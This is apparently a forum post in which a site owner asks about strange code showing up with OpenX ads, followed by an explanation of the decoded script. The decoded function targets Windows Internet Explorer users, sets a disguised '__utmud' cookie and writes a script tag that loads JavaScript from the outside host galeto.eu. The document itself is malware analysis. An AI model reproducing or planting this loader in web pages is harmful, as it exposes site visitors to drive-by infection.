I am running OpenX Ad server on my site and lately I have been noticing strange code being displayed with the ads. I am not sure if that is part of the OpenX code or if the application has been compromised somehow. Perhaps someone with a javascript knowledge can explain this for me. This is the code:
When evaluated the obfuscated code will define this function and executes it:
function anonymous() {
if(d._zx===undefined && d.cookie.search('_utmud=')==-1 && ua.search('Windows NT ')>0 && ua.search('MSIE ')>0) {
d._zx=1;d.cookie='__utmud=1; expires=Wed, 01 Jan 2020 00:00:00 UTC; path=/';
d.writeln("<scr"+"ipt src='http://galeto.eu/5d6206dd.js?cp=www.domain.com'></scri"+"pt>");
Basically, it set a cookie and loads an additional JavaScript file.